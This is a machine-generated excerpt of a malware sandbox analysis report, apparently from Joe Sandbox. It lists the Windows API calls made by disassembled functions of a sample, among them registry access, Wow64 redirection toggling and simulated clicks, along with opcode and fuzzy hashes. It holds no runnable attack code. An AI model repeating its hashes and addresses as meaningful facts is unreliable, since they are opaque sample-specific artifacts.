                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: 9db976a751e35a514a6cc80aee952e2e800b64ad0950e5039622a1de89a69ffd
                                                              • Instruction ID: 818afa427a5783bf353a01b796da8e441c5f44a00172c51e3764ff58246105fb
                                                              • Opcode Fuzzy Hash: 9db976a751e35a514a6cc80aee952e2e800b64ad0950e5039622a1de89a69ffd
                                                              • Instruction Fuzzy Hash: C1E0E576004241BFDB015FA1ED4CB0EBF39FF49332B104220F2268A070CB329420DB50
                                                              APIs
                                                                • Part of subcall function 00C54154: _wcslen.LIBCMT ref: 00C54159
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CBCEAE
                                                              • _wcslen.LIBCMT ref: 00CBCEF5
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CBCF5C
                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CBCF8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                              • String ID: 0
                                                              • API String ID: 1227352736-4108050209
                                                              • Opcode ID: 4a117e3f7628d699d21030f22e795b80fda424e951cea2e533ae671958ad1e31
                                                              • Instruction ID: bafade66855354d0abe5622a62bb1f86860776d8c2c3802f5be6bdb4866555ee
                                                              • Opcode Fuzzy Hash: 4a117e3f7628d699d21030f22e795b80fda424e951cea2e533ae671958ad1e31
                                                              • Instruction Fuzzy Hash: 2551BF71604300AFD7149FA8C8C5BBBBBE9AF99314F040A6DF9A5D72A0D770CA44DB52
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE4794
                                                              • IsMenu.USER32(?), ref: 00CE47A9
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE47F1
                                                              • DrawMenuBar.USER32 ref: 00CE4804
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Menu$Item$DrawInfoInsert
                                                              • String ID: 0
                                                              • API String ID: 3076010158-4108050209
                                                              • Opcode ID: 5423272c35c96b464c1d4fde8bb08739132ba88f6a9956ff6d37a4ba8d87dfb1
                                                              • Instruction ID: a2a97e18ccc0791c5fdb1b5afbe93ba5f4ceee36776d773568446a629560b033
                                                              • Opcode Fuzzy Hash: 5423272c35c96b464c1d4fde8bb08739132ba88f6a9956ff6d37a4ba8d87dfb1
                                                              • Instruction Fuzzy Hash: B9414A75A01289EFEB24CF52D884AAABBB5FF49315F044129F9159B390C730EE50CFA0
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CB4536: GetClassNameW.USER32(?,?,000000FF), ref: 00CB4559
                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CB26F6
                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CB2709
                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00CB2739
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_wcslen$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 2081771294-1403004172
                                                              • Opcode ID: 5b9e17f8f3b395bb2c042963bbca73b9840ddb18e50809b50743e2129a2a93c8
                                                              • Instruction ID: ce6d2923a70cb9950b4ab26b2a1fa5ffe4f765dfd0164132411b88e13278e0d0
                                                              • Opcode Fuzzy Hash: 5b9e17f8f3b395bb2c042963bbca73b9840ddb18e50809b50743e2129a2a93c8
                                                              • Instruction Fuzzy Hash: 4B21F175900148BFDB14ABA4DC86DFFBBB8DF45760F104119F822AB1E5CF384E4AA624
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C750AE,?,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002), ref: 00C7511D
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C75130
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00C750AE,?,?,00C7504E,?,00D198D8,0000000C,00C751A5,?,00000002,00000000), ref: 00C75153
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 341f1f29a10bdbf9e5728e4e4743838617fbfb66df2f05e7120f2da498136937
                                                              • Instruction ID: cac0b672d4d8baaae88f3d20464dc893bbeaab254d8a67d6d97fca23ff7046f7
                                                              • Opcode Fuzzy Hash: 341f1f29a10bdbf9e5728e4e4743838617fbfb66df2f05e7120f2da498136937
                                                              • Instruction Fuzzy Hash: 4DF04F31A00208BBDB119B94DC49BADBBB5EF04752F454069F90AA6260CB719E40DA91
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C5633E
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C56350
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00C5637F,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 145871493-3689287502
                                                              • Opcode ID: 4d6a09df7a8c82a37bfdf488c469bd3d64eefe1dd1731817a6b667eacf47e6f8
                                                              • Instruction ID: 9167d6dd74dd7e86832483e915241c5b1e2239e330bb1e8f0e87527972b14cf6
                                                              • Opcode Fuzzy Hash: 4d6a09df7a8c82a37bfdf488c469bd3d64eefe1dd1731817a6b667eacf47e6f8
                                                              • Instruction Fuzzy Hash: 3FE0CD36701B2217925117157C08B6E67189F91F737450015FD12D7110DF60CD45C1B4
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56304
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C56316
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00C954C3,?,?,00C560AA,?,00000001,?,?,00000000), ref: 00C56329
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 145871493-1355242751
                                                              • Opcode ID: 97787b5a1ec6345266b3e29a096dc5c603d5e5b1cb02efcc1411ee3f64b7c106
                                                              • Instruction ID: 6ed9aef9330e7ae978bc023ebf4a2db6b51e6da72a373625c48172402f58329c
                                                              • Opcode Fuzzy Hash: 97787b5a1ec6345266b3e29a096dc5c603d5e5b1cb02efcc1411ee3f64b7c106
                                                              • Instruction Fuzzy Hash: C1D0123A6425616752222725BC18B8E7E25DE85B723850169FC12AB238CF61CE4585A4
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32 ref: 00CDAD86
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00CDAD94
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00CDADC7
                                                              • CloseHandle.KERNEL32(?), ref: 00CDAF9C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                              • String ID:
                                                              • API String ID: 3488606520-0
                                                              • Opcode ID: f4ba873587e68b6eb727b84a7fe72f127f6a0c4ce3ca32467da4614effcaa7a3
                                                              • Instruction ID: 11f318fdb1a61a4e0db2426ca2924f402cbf84d4761c8459c2a5a828233492f9
                                                              • Opcode Fuzzy Hash: f4ba873587e68b6eb727b84a7fe72f127f6a0c4ce3ca32467da4614effcaa7a3
                                                              • Instruction Fuzzy Hash: 29A1BFB5604300AFD724DF24C886B2AB7E5AF44714F14885EFA99DB392DB70ED44CB86
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                                • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD350
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3C7
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3FD
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC404
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CDC45F
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00CDC4C2
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00CDC505
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDC512
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 826366716-0
                                                              • Opcode ID: e266712e04f72668b41dc9c4e2bf4fa4bf5d0434607cc53d6eb572ef4414f9ac
                                                              • Instruction ID: 612cb5737b5ac2018f1250312066307ad7b070eab871a332b9902c40ffddee9f
                                                              • Opcode Fuzzy Hash: e266712e04f72668b41dc9c4e2bf4fa4bf5d0434607cc53d6eb572ef4414f9ac
                                                              • Instruction Fuzzy Hash: 0B617F35108242AFD714DF24C4D4E3ABBE5BF84308F14859DF55A8B2A2DB31ED45DB92
                                                              APIs
                                                                • Part of subcall function 00CBE60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CBD6E2,?), ref: 00CBE629
                                                                • Part of subcall function 00CBE60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CBD6E2,?), ref: 00CBE642
                                                                • Part of subcall function 00CBE9C5: GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00CBEC9F
                                                              • MoveFileW.KERNEL32(?,?), ref: 00CBECD8
                                                              • _wcslen.LIBCMT ref: 00CBEE17
                                                              • _wcslen.LIBCMT ref: 00CBEE2F
                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00CBEE7C
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                              • String ID:
                                                              • API String ID: 3183298772-0
                                                              • Opcode ID: 334993758d4ed2739b2995e3ef2871b386bf10e94091fdadec723a1ce186b16d
                                                              • Instruction ID: 945cb82b8dc7b8f5a8a704829c30883be323f40405b36398b70d81b2d8becae6
                                                              • Opcode Fuzzy Hash: 334993758d4ed2739b2995e3ef2871b386bf10e94091fdadec723a1ce186b16d
                                                              • Instruction Fuzzy Hash: AD5162B24083859BC764EB64D881ADFB7ECAF84710F10492EF599D3152EF70E6888756
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID:
                                                              • API String ID: 269201875-0
                                                              • Opcode ID: 16bba88e7eb5654f1bad043698620caa74026603201445fdc53a4604a5cd01b1
                                                              • Instruction ID: cc69c957848dc7c5e9018bc883abd82a5421d1260955cb82ee5d2a3438120c19
                                                              • Opcode Fuzzy Hash: 16bba88e7eb5654f1bad043698620caa74026603201445fdc53a4604a5cd01b1
                                                              • Instruction Fuzzy Hash: FC411772A00204AFDB20EF78C885A5DB7F5EF88318F1581A9E525EB395DB31ED02DB54
                                                              APIs
                                                              • GetInputState.USER32 ref: 00CC4225
                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00CC427C
                                                              • TranslateMessage.USER32(?), ref: 00CC42A5
                                                              • DispatchMessageW.USER32(?), ref: 00CC42AF
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CC42C0
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                              • String ID:
                                                              • API String ID: 2256411358-0
                                                              • Opcode ID: cfc5160b28d1b16ac8c5a3c199aba8177b5bdc3df7bf405fc0e391074279deea
                                                              • Instruction ID: 23c02ea557a97f2569d6970a79e481240fccb165c3aea50918f8ef9646d04ee5
                                                              • Opcode Fuzzy Hash: cfc5160b28d1b16ac8c5a3c199aba8177b5bdc3df7bf405fc0e391074279deea
                                                              • Instruction Fuzzy Hash: 5131A670504381AEEB3CCB64D85AFBB77A8EB15305F04856DF472C61A0D7649686CB21
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00CB21A5
                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 00CB2251
                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00CB2259
                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00CB226A
                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00CB2272
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: 4888612ff2d253c47a38c7a59c1bfa25a0dfcce06ee624aa5060553faba3e5f3
                                                              • Instruction ID: dec68a74a2b054fe0a0dd1a95e09ae5a5d3b22182477f86df23273af6cb8d9fb
                                                              • Opcode Fuzzy Hash: 4888612ff2d253c47a38c7a59c1bfa25a0dfcce06ee624aa5060553faba3e5f3
                                                              • Instruction Fuzzy Hash: EF319E71900259EFDB04CFA8CD89BDE3BB5EB14325F104225FA25EB2D0C770AA448B91
                                                              APIs
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CE60A4
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CE60FC
                                                              • _wcslen.LIBCMT ref: 00CE610E
                                                              • _wcslen.LIBCMT ref: 00CE6119
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE6175
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$_wcslen
                                                              • String ID:
                                                              • API String ID: 763830540-0
                                                              • Opcode ID: b3bd2831b1d4fcfb931447b566371bdf21dd7f4644423aee17677450f23446fe
                                                              • Instruction ID: 2b08cbb00e0a8ca6492ab4fd4b862ace9572da2a3cb4e80bd8097b55206deef4
                                                              • Opcode Fuzzy Hash: b3bd2831b1d4fcfb931447b566371bdf21dd7f4644423aee17677450f23446fe
                                                              • Instruction Fuzzy Hash: 6421EA31900298ABDF119FA6CC85AEEBBB8FF14354F108216FA25DB1C5D7709685CF60
                                                              APIs
                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?,?,00CB0BEE), ref: 00CB08BB
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?), ref: 00CB08D6
                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?), ref: 00CB08E4
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?), ref: 00CB08F4
                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00CB07D1,80070057,?,?), ref: 00CB0900
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                              • String ID:
                                                              • API String ID: 3897988419-0
                                                              • Opcode ID: c331c05e212b427936bd8fcfe4a2de425f6fd0367fb9aedbca47c00acc8f3551
                                                              • Instruction ID: 186389b0c001be1b91231ed5a22d91c126e4f044c4ce6167c9081437f3d205dc
                                                              • Opcode Fuzzy Hash: c331c05e212b427936bd8fcfe4a2de425f6fd0367fb9aedbca47c00acc8f3551
                                                              • Instruction Fuzzy Hash: CC014F76A00218AFDB114F65DC48B9F7BBDEB48792F244024F946DA251E772DE409BE0
                                                              APIs
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0BE0
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0BED
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0BFA
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0C07
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0C14
                                                              • CloseHandle.KERNEL32(?,?,?,?,00CC0A39,?,00CC3C56,?,00000001,00C93ACE,?), ref: 00CC0C21
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 6c683e57cfa1278fe6ec92deef3658387a2e6f7679265cb640a9ddd95d77d787
